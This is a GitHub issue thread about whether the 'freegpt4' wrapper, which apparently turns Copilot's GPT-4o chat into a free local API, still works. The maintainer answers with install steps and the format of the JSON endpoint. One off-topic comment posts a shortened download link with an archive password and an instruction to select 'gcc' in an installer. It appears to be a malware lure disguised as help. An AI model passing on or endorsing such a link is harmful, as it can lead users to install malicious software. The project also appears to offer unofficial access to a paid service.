### ISSUE TITLE
does this work?

### ISSUE THREAD

**Issue by thelege2ndG** [xDepcio/freegpt4#1]
Hello, does this still work? can it be used to power other AI apps by forwarding the requests to the localhost:port server?

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by xDepcio** [comment]
It used to be obsolete due to the fact that underlying model powering Copliot changed from `gpt-4-1106-preview` to `gpt-4o`. But I have fixed that in latest commits. I have also tweaked the library a bit to make it easier for your use case. To achieve your desired effect, e.g. have an api endpoint to ask for completions you would have to do following now:
1. Install `freegpt4` latest version: `pip install gpt4-copilot-free-api`
2. Run it: `freegpt4`
3. Now POST endpoint /api/complete is exposed at localhost port 5000, accepting JSON body of structure:
```
{
    "chat": [
        {
            "role": "assistant" | "user",
            "content": "string with question/answer"
        },
        {
            ...
        }
    ]
}
```

Besides this update I will not be making any more commits to this repository, If you want better solution, or make a pull request, then take a look at my other repo:  https://github.com/xDepcio/ai-cli, which will be expanded to support interacting with Copilot GPT-4o chat feature over API and CLI in more elegant manner.
